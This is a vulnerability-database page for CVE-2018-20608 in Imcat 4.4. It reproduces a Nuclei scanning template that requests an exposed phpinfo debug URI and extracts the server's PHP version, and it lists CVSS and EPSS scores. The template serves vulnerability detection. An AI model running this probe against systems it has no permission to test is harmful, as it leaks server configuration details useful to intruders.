Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2018-20608
HistoryJul 25, 2023 - 5:43 p.m.

Imcat 4.4 - Phpinfo Configuration

2023-07-2517:43:09
ProjectDiscovery
github.com
125
imcat
phpinfo
configuration
txjia
vulnerability
remote
attackers
sensitive
information

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

EPSS

0.037

Percentile

91.9%

Imcat 4.4 allows remote attackers to read phpinfo output via the root/tools/adbug/binfo.php?phpinfo1 URI.

id: CVE-2018-20608

info:
  name: Imcat 4.4 - Phpinfo Configuration
  author: ritikchaddha
  severity: high
  description: Imcat 4.4 allows remote attackers to read phpinfo output via the root/tools/adbug/binfo.php?phpinfo1 URI.
  impact: |
    The vulnerability can lead to the exposure of sensitive information, such as server configuration details.
  remediation: |
    Update Imcat to the latest version or apply the necessary patches to fix the Phpinfo Configuration vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2018-20608
    - https://github.com/SexyBeast233/SecBooks
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2018-20608
    cwe-id: CWE-200
    epss-score: 0.0111
    epss-percentile: 0.84208
    cpe: cpe:2.3:a:txjia:imcat:4.4:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: txjia
    product: imcat
  tags: cve2018,cve,imcat,phpinfo,config,txjia

http:
  - method: GET
    path:
      - "{{BaseURL}}/imcat/root/tools/adbug/binfo.php?phpinfo1"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "PHP Extension"
          - "PHP Version"
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        group: 1
        regex:
          - '>PHP Version <\/td><td class="v">([0-9.]+)'
        part: body
# digest: 4b0a004830460221009a172bf2d6f5205be1210274d0b843b9ed22d1642071ca1ef3f3a640f8041c9d022100965b93625f3e57ec307aa6beaba6e21a873855c77fcf4b7c48c63029bb2fffc3:922c64590222798bb761d5b6d8e72950

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

EPSS

0.037

Percentile

91.9%

Related for NUCLEI:CVE-2018-20608